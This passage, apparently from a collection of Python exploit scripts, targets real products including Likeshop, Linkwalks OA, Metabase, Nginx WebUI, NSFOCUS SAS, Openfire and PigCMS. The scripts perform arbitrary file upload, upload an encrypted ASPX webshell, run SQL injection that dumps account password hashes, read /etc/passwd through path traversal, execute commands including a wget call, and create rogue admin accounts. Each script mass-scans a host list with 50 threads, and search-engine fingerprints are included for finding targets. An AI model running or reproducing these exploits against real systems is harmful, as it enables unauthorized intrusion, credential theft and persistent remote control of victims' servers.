020\\u0063\\u006c\\u0073\\u002e\\u0067\\u0065\\u0074\\u0044\\u0065\\u0063\\u006c\\u0061\\u0072\\u0065\\u0064\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0077\\u0072\\u0061\\u0070\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0062\\u0079\\u0074\\u0065\\u005b\\u005d\\u002e\\u0063\\u006c\\u0061\\u0073\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0063\\u006c\\u0073\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u0072\\u0065\\u0073\\u0075\\u006c\\u0074\\u007d\\u0029\\u003b\\u0072\\u0065\\u0073\\u0070\\u002e\\u0067\\u0065\\u0074\\u0043\\u006c\\u0061\\u0073\\u0073\\u0028\\u0029\\u002e\\u0067\\u0065\\u0074\\u004d\\u0065\\u0074\\u0068\\u006f\\u0064\\u0028\\u0022\\u0064\\u006f\\u0057\\u0072\\u0069\\u0074\\u0065\\u0022\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u0043\\u006c\\u0061\\u0073\\u0073\\u005b\\u005d\\u007b\\u0063\\u006c\\u0073\\u007d\\u0029\\u002e\\u0069\\u006e\\u0076\\u006f\\u006b\\u0065\\u0028\\u0072\\u0065\\u0073\\u0070\\u002c\\u0020\\u006e\\u0065\\u0077\\u0020\\u004f\\u0062\\u006a\\u0065\\u0063\\u0074\\u005b\\u005d\\u007b\\u006f\\u0062\\u006a\\u007d\\u0029\\u003b\\u0020\\u007d\\u0066\\u006c\\u0061\\u0067\\u0020\\u003d\\u0020\\u0074\\u0072\\u0075\\u0065\\u003b\\u0020\\u007d\\u0069\\u0066\\u0020\\u0028\\u0066\\u006c\\u0061\\u0067\\u0029\\u0020\\u007b\\u0020\\u0062\\u0072\\u0065\\u0061\\u006b\\u003b\\u0020\\u007d\\u0020\\u007d\\u0069\\u0066\\u0020\\u0028\\u0066\\u006c\\u0061\\u0067\\u0029\\u0020\\u007b\\u0020\\u0062\\u0072\\u0065\\u0061\\u006b\\u003b\\u0020\\u007d\\u0020\\u007d\\u0020\\u0063\\u0061\\u0074\\u0063\\u0068\\u0020\\u0028\\u0045\\u0078\\u0063\\u0065\\u0070\\u0074\\u0069\\u006f\\u006e\\u0020\\u0065\\u0029\\u0020\\u007b\\u0020\\u0063\\u006f\\u006e\\u0074\\u0069\\u006e\\u0075\\u0065\\u003b\\u0020\\u007d\\u0020\\u007d"
44 |     vulurl = "http://"+url + "/data/sys-common/treexml.tmpl"
45 |     try:
46 |         r = requests.post(vulurl, headers=headers,data=data)
47 |         if r.status_code==200 and "Execute" in r.text :
48 |             print("http://"+host+":true"+" 所在目录： "+r.text[62:85])
49 |         else:
50 |             return 0
51 |             print (host+":false")
52 |     except:
53 |         return 0
54 |         print (host+":false")
55 | 
56 | 
57 | if __name__ == '__main__':
58 |     file = sys.argv[1]
59 |     data = open(file)
60 |     reader = csv.reader(data)
61 |     with ThreadPoolExecutor(50) as pool:
62 |         for row in reader:
63 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Likeshop_Formimage_Uploadfile_poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # zoomeye:iconhash: "b2e68d0acf5b3117f88421799920ab98"
 6 | # fofa:  icon_hash="874152924"
 7 | 
 8 | import sys
 9 | import requests
10 | import csv
11 | import urllib3
12 | import hashlib
13 | import json
14 | from concurrent.futures import ThreadPoolExecutor
15 | 
16 | if len(sys.argv) != 2:
17 |     print(
18 |         '+----------------------------------------------------------------------------------------------------------+')
19 |     print(
20 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
21 |     print(
22 |         '+----------------------------------------------------------------------------------------------------------+')
23 |     print(
24 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
25 |     print(
26 |         '+ EXP: python3 Likeshop_Formimage_Uploadfile_poc.py url.txt                                             +')
27 |     print(
28 |         '+----------------------------------------------------------------------------------------------------------+')
29 |     sys.exit()
30 | proxysdata = {
31 | 'https': '127.0.0.1:8080'
32 | }  
33 | requests.packages.urllib3.disable_warnings()
34 | 
35 | def exp(host):
36 |     if "http" in host:
37 |         url = host
38 |     else:
39 |         url ="http://"+host
40 |     host1=url.replace("http://","")
41 |     host2=host1.replace("https://","")
42 |     headers = {
43 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
44 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryJpMyThWnAxbcBBQc",
45 |         "Host": "%s" %host2,
46 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
47 |         "Accept": "*/*",
48 |         "Accept-Encoding": "gzip, deflate"
49 |     }
50 |     vulurl = url + "/api/file/formimage"
51 |     data="""------WebKitFormBoundaryJpMyThWnAxbcBBQc
52 | Content-Disposition: form-data; name="file";filename="test.php"
53 | Content-Type: application/x-php
54 | 
55 | test
56 | ------WebKitFormBoundaryJpMyThWnAxbcBBQc--"""
57 |     try:
58 |         r = requests.post(vulurl, data=data,headers=headers,verify=False)
59 |         if r.status_code==200 and "base_url" in r.text:
60 |             dict_json=json.loads(r.text)
61 |             
62 |             print(url+" 上传文件地址为:" + dict_json['data']['url'])     
63 |         else:
64 |             return 0
65 |             print (host+":false")
66 |     except:
67 |         return 0
68 |         print (host+":false")
69 | 
70 | 
71 | if __name__ == '__main__':
72 |     file = sys.argv[1]
73 |     data = open(file)
74 |     reader = csv.reader(data)
75 |     with ThreadPoolExecutor(50) as pool:
76 |         for row in reader:
77 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Linkwalks_OA_GetIMDictionary_Sql_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fid="/yV4r5PdARKT4jaqLjJYqw=="
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+-------------------------------------------------------------------------------------------------- -------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
23 |     print(
24 |         '+ EXP: python3 Linkwalks_OA_GetIMDictionary_Sql_Poc.py url.txt                                                  +')
25 |     print(
26 |         '+-------------------------------------------------------------------------------------------------- --------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | } 
31 | def poc(host):
32 |     if "http" in host:
33 |         url = host
34 |     else:
35 |         url ="http://"+host
36 |     host1=url.replace("http://","")
37 |     host2=host1.replace("https://","")
38 |     headers = {
39 |         "User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Chrome/83.0.4103.116 Safari/537.36",
40 |         "Accept-Encoding":"gzip, deflate",
41 |         "Accept": "*/*",
42 |         "Connection":"close",
43 |         "Content-Type":"application/x-www-form-urlencoded",
44 |         "Content-Length":"89",
45 |         "Host":"%s" % host2
46 | 
47 |     }
48 |     vulurl = url + "/Webservice/IM/Config/ConfigService.asmx/GetIMDictionary"
49 |     data="dasdas=&key=1' UNION ALL SELECT top 1812 concat(F_CODE,':',F_PWD_MD5) from T_ORG_USER --"
50 |     try:
51 |         r = requests.post(vulurl, headers=headers,data=data)
52 |         # print(r.content)
53 |         path = r.text.replace('\"',"").replace('{',"").replace('}',"").split('value=')[1].split('&gt;&lt;/')[0]
54 |         if r.status_code==200 and str(path) != " ": 
55 |             print(host+":true 账号+MD5为:"+path)
56 |             
57 |         else:
58 |             return 0
59 |     except:
60 |         return 0
61 | 
62 | 
63 | if __name__ == '__main__':
64 |     file = sys.argv[1]
65 |     data = open(file)
66 |     reader = csv.reader(data)
67 |     with ThreadPoolExecutor(50) as pool:
68 |         for row in reader:
69 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/Linkwalks_OA_Msgbroadcastuploadfile_UploadFile_Exp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fid="/yV4r5PdARKT4jaqLjJYqw=="
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 5:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+-------------------------------------------------------------------------------------------------- -------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                       +')
23 |     print(
24 |         '+ EXP: python3 Linkwalks_OA_Msgbroadcastuploadfile_UploadFile_Exp -t target -c Cookies                                                  +')
25 |     print(
26 |         '+-------------------------------------------------------------------------------------------------- --------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | } 
31 | requests.packages.urllib3.disable_warnings()
32 | def exp(host,cookie):
33 |     if "http" in host:
34 |         url = host
35 |     else:
36 |         url ="http://"+host
37 |     host1=url.replace("http://","")
38 |     host2=host1.replace("https://","")
39 |     headers = {
40 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
41 |         "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryFfJZ4PlAZBixjELj",
42 |         "Host": "%s" %host2,
43 |         "Cookie": "%s" %cookie,
44 |         
45 |     }
46 |     vulurl = url + "/gtp/im/services/group/msgbroadcastuploadfile.aspx"
47 |     data="""------WebKitFormBoundaryFfJZ4PlAZBixjELj
48 | Content-Disposition: form-data; filename="2.aspx";filename="1.jpg"
49 | Content-Type: application/text
50 | 
51 | 
52 | <%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","6c58323f6bb99d2"); /*该密钥为连接密码32位md5值的前16位，默认连接密码hackbeybey*/byte[] k = Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);%>
53 | 
54 | ------WebKitFormBoundaryFfJZ4PlAZBixjELj--"""
55 |     try:
56 |         r = requests.post(vulurl, data=data,headers=headers,verify=False,proxies=proxysdata)
57 |         #print(r.text)
58 |         if "success" in r.text :
59 |             path = r.text.replace('\"',"").replace('{',"").replace('}',"").replace('\'',"").split('result:')[1]
60 |             print("shell地址为"+url+"/GTP/IM/Services/Group/Upload/"+path)     
61 |         else:
62 |             return 0
63 |             print (host+":false")
64 |     except:
65 |         return 0
66 |         print (host+":false")
67 | 
68 | 
69 | if __name__ == '__main__':
70 |     host = sys.argv[2]
71 |     cookie=sys.argv[4]
72 |     exp(host,cookie)


--------------------------------------------------------------------------------
/Metabase_RCE_CVE_2023_38646_poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | 
 6 | import sys
 7 | import requests
 8 | import csv
 9 | from concurrent.futures import ThreadPoolExecutor
10 | 
11 | if len(sys.argv) != 2:
12 |     print(
13 |         '+----------------------------------------------------------------------------------------------------------+')
14 |     print(
15 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
16 |     print(
17 |         '+----------------------------------------------------------------------------------------------------------+')
18 |     print(
19 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
20 |     print(
21 |         '+ EXP: python3 Metabase_RCE_CVE_2023_38646_poc.py url.txt                                                         +')
22 |     print(
23 |         '+----------------------------------------------------------------------------------------------------------+')
24 |     sys.exit()
25 | def exp(host):
26 |     url = "http://" + host
27 |     headers = {
28 |         "Host": "%s" % host,
29 |         "Referer": url,
30 |         "Cache-Control": "max-age=0",
31 |         "Upgrade-Insecure-Requests": "1",
32 |         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
33 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
34 |         "Accept-Encoding": "gzip, deflate",
35 |         "Accept-Language": "zh-CN,zh;q=0.9",
36 |         "Connection": "close",
37 |     }
38 |     
39 |     vulurl = url + "/api/session/properties"
40 |     try:
41 |         r = requests.get(vulurl, headers=headers)
42 |         if "setup-token" in r.text and "\"setup-token\":null" not in r.text:
43 |             print (host+":true")
44 |         else:
45 |             return 0
46 |             print (host+":false")
47 |     except:
48 |         print (host+":false")
49 | 
50 | 
51 | if __name__ == '__main__':
52 |     file = sys.argv[1]
53 |     data = open(file)
54 |     reader = csv.reader(data)
55 |     with ThreadPoolExecutor(50) as pool:
56 |         for row in reader:
57 |             pool.submit(exp, row[0])
58 | 


--------------------------------------------------------------------------------
/Nginx_WebUI_Runcmd_Rce_Exp.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # product="nginxWebUI" && fid="LAIPrH0vza0EiC1AmkNLfw=="
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 Nginx_WebUI_Runcmd_Rce_Exp.py url.txt                                                       +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8080'
30 | } 
31 | def poc(host):
32 |     url = host
33 |     headers = {
34 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
35 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
36 |         "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
37 |         "Accept-Encoding": "gzip, deflate",
38 |         "Accept":"*/*",
39 |         "Host":"%s" %host
40 |     }
41 |     vulurl = "http://"+url + "/AdminPage/conf/runCmd?cmd=id"
42 |     try:
43 |         r = requests.get(vulurl, headers=headers)
44 |         if r.status_code==200 and "wheel" in r.text :
45 |             #print(host)
46 |             print("http://"+host+":true id="+r.text[82:116])
47 |         else:
48 |             return 0
49 |             print (host+":false")
50 |     except:
51 |         print (host+":false")
52 | 
53 | 
54 | if __name__ == '__main__':
55 |     file = sys.argv[1]
56 |     data = open(file)
57 |     reader = csv.reader(data)
58 |     with ThreadPoolExecutor(50) as pool:
59 |         for row in reader:
60 |             pool.submit(poc, row[0])


--------------------------------------------------------------------------------
/NsFocus_SAS_Exec_Rce_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="NSFOCUS-SAS"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 NsFocus_SAS_Exec_Rce_Poc.py url.txt                                               +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | requests.packages.urllib3.disable_warnings()
32 | 
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "multipart/form-data;multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85",
43 |         "Host": "%s" %host2
44 |     }
45 |     vulurl = url + "/webconf/Exec/index?cmd=wget%20xxx.xxx.xxx"
46 |     try:
47 |         r = requests.get(vulurl, headers=headers,verify=False)
48 |         if r.status_code==200 :
49 |             print(url+" :true")    
50 |         else:
51 |             return 0
52 |             print (host+":false")
53 |     except:
54 |         return 0
55 |         print (host+":false")
56 | 
57 | 
58 | if __name__ == '__main__':
59 |     file = sys.argv[1]
60 |     data = open(file)
61 |     reader = csv.reader(data)
62 |     with ThreadPoolExecutor(50) as pool:
63 |         for row in reader:
64 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/NsFocus_SAS_GetFile_FileRead_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="NSFOCUS-SAS"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 NsFocus_SAS_GetFile_FileRead_Poc.py url.txt                                               +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | requests.packages.urllib3.disable_warnings()
32 | 
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "multipart/form-data;multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85",
43 |         "Host": "%s" %host2
44 |     }
45 |     vulurl = url + "/webconf/GetFile/index?path=../../../../../../../../../../../../../../etc/passwd"
46 |     try:
47 |         r = requests.get(vulurl, headers=headers,verify=False)
48 |         if r.status_code==200 and "" in r.text:
49 |             print(url+" :true"+r.text)    
50 |         else:
51 |             return 0
52 |             print (host+":false")
53 |     except:
54 |         return 0
55 |         print (host+":false")
56 | 
57 | 
58 | if __name__ == '__main__':
59 |     file = sys.argv[1]
60 |     data = open(file)
61 |     reader = csv.reader(data)
62 |     with ThreadPoolExecutor(50) as pool:
63 |         for row in reader:
64 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/NsFocus_SAS_LocalUser_Login_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # app="NSFOCUS-SAS"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 NsFocus_SAS_LocalUser_Login_Poc.py url.txt                                               +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | requests.packages.urllib3.disable_warnings()
32 | 
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "multipart/form-data;multipart/form-data; boundary=25d6580ccbac7409f39b085b3194765e6e5adaa999d5cc85028bd0ae4b85",
43 |         "Host": "%s" %host2
44 |     }
45 |     vulurl = url + "/api/virtual/home/status?cat=../../../../../../../../../../../../../../usr/local/nsfocus/web/apache2/www/local_user.php&method=login&user_account=admin"
46 |     try:
47 |         r = requests.get(vulurl, headers=headers,verify=False)
48 |         if r.status_code==200 and "status\":200" in r.text:
49 |             print(url+" :true")    
50 |         else:
51 |             return 0
52 |             print (host+":false")
53 |     except:
54 |         return 0
55 |         print (host+":false")
56 | 
57 | 
58 | if __name__ == '__main__':
59 |     file = sys.argv[1]
60 |     data = open(file)
61 |     reader = csv.reader(data)
62 |     with ThreadPoolExecutor(50) as pool:
63 |         for row in reader:
64 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/Openfire_Bypass_CVE_2023_32315_poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # icon_hash="1211608009"
 6 | import sys
 7 | import requests
 8 | import csv
 9 | import string
10 | import random
11 | import HackRequests
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                   +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                           +')
23 |     print(
24 |         '+ EXP: python3 Openfire_Bypass_CVE_2023_32315_poc.py url.txt                                                         +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | def checkversion(version):
29 |     if version >= "3.10.0" and version < "4.6.8":
30 |         return True
31 |     elif version >= "4.7.0" and version < "4.7.5":
32 |         return True
33 |     else:
34 |         return False
35 | def randomstring():
36 |     a=string.ascii_lowercase
37 |     str=''.join(random.choices(a, k=6))
38 |     return str
39 | 
40 | def exp(host):
41 |     url = "http://" + host
42 |     header1 = {
43 |         "Host": "%s" % host,
44 |         "Referer": url,
45 |         "Cache-Control": "max-age=0",
46 |         "Upgrade-Insecure-Requests": "1",
47 |         "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
48 |         "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
49 |         "Accept-Encoding": "gzip, deflate",
50 |         "Accept-Language": "zh-CN,zh;q=0.9",
51 |         "Connection": "close",
52 |     }
53 |     
54 |     getinfourl = url + "/setup/setup-s/%u002e%u002e/%u002e%u002e/user-groups.jsp"
55 |     
56 |     try:
57 |         r = HackRequests.hackRequests().http(getinfourl, headers=header1)
58 |         jsessionid = r.cookies.get('JSESSIONID', '')
59 |         csrf = r.cookies.get('csrf', '')
60 |         if jsessionid != "" and csrf != "":
61 |             user=randomstring()
62 |             passwd=randomstring()
63 |             createurl=url+"/setup/setup-s/%u002e%u002e/%u002e%u002e/user-create.jsp?csrf="+csrf+"&username="+user+"&name=&email=&password="+passwd+"&passwordConfirm="+passwd+"&isadmin=on&create=%E5%88%9B%E5%BB%BA%E7%94%A8%E6%88%B7"
64 |             header2 = {
65 |                 "Host": "%s" % host,
66 |                 "DNT": "1",
67 |                 "Cookie":"JSESSIONID="+jsessionid+";csrf="+csrf,
68 |                 "Referer": url,
69 |                 "Cache-Control": "max-age=0",
70 |                 "Upgrade-Insecure-Requests": "1",
71 |                 "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36",
72 |                 "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
73 |                 "Accept-Encoding": "gzip, deflate",
74 |                 "Accept-Language": "zh-CN,zh;q=0.9",
75 |                 "Connection": "close",
76 |             }
77 |             r2=HackRequests.hackRequests().http(createurl, headers=header2)
78 |             if r2.status_code==200:
79 |                 print(host+":true"+"\nJSESSIONID="+jsessionid+"\ncsrf="+csrf+"\nusername="+user+"\npassword="+passwd)
80 |             else:
81 |                 return 0
82 |         else:
83 |             return 0
84 |             print (host+":false")
85 |     except:
86 |         print (host+":false")
87 | 
88 | if __name__ == '__main__':
89 |     file = sys.argv[1]
90 |     data = open(file)
91 |     reader = csv.reader(data)
92 |     with ThreadPoolExecutor(50) as pool:
93 |         for row in reader:
94 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/PigCMS_Action_FlashUpload_UploadFile_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # product="小猪CMS"
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
10 | import urllib3
11 | import hashlib
12 | from concurrent.futures import ThreadPoolExecutor
13 | 
14 | if len(sys.argv) != 2:
15 |     print(
16 |         '+----------------------------------------------------------------------------------------------------------+')
17 |     print(
18 |         '+ DES: by MDSEC as https://github.com/MD-SEC/MDPOCS                                                        +')
19 |     print(
20 |         '+----------------------------------------------------------------------------------------------------------+')
21 |     print(
22 |         '+ USE: python3 <filename> <hosts.txt>                                                                      +')
23 |     print(
24 |         '+ EXP: python3 PigCMS_Action_FlashUpload_UploadFile_Poc.py url.txt                                        +')
25 |     print(
26 |         '+----------------------------------------------------------------------------------------------------------+')
27 |     sys.exit()
28 | proxysdata = {
29 | 'http': '127.0.0.1:8081'
30 | }  
31 | requests.packages.urllib3.disable_warnings()
32 | 
33 | def exp(host):
34 |     if "http" in host:
35 |         url = host
36 |     else:
37 |         url ="http://"+host
38 |     host1=url.replace("http://","")
39 |     host2=host1.replace("https://","")
40 |     headers = {
41 |         "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0",
42 |         "Content-Type": "multipart/form-data; boundary=--------------------------835846770881083140190666",
43 |         "Host": "%s" %host2
44 |     }
45 |     vulurl = url + "/cms/manage/admin.php?m=manage&c=background&a=action_flashUpload"
46 |     data='----------------------------835846770881083140190666\r\nContent-Disposition: form-data; name="filePath"; filename="test.php"\r\nContent-Type: video/x-flv\r\n\r\n<?php print "test" ;unlink(__FILE__) ;?>\r\n----------------------------835846770881083140190666--'
47 |     try:
48 |         r = requests.post(vulurl, data=data,headers=headers,verify=False)
49 |         #print(r.text)
50 |         if "MAIN_URL_ROOT" in r.text :
51 |             index=r.text.find("MAIN_URL_ROOT")
52 |             print("shell地址为"+url+"/cms/"+r.text[index+13:])     
53 |         else:
54 |             return 0
55 |             print (host+":false")
56 |     except:
57 |         return 0
58 |         print (host+":false")
59 | 
60 | 
61 | if __name__ == '__main__':
62 |     file = sys.argv[1]
63 |     data = open(file)
64 |     reader = csv.reader(data)
65 |     with ThreadPoolExecutor(50) as pool:
66 |         for row in reader:
67 |             pool.submit(exp, row[0])


--------------------------------------------------------------------------------
/QAX_Sec3600_Firewall_UploadFile_Poc.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/python3
 2 | # -*- coding:utf-8 -*-
 3 | # author:MDSEC
 4 | # from:https://github.com/MD-SEC/MDPOCS
 5 | # fid="1Lh1LHi6yfkhiO83I59AYg=="
 6 | 
 7 | import sys
 8 | import requests
 9 | import csv
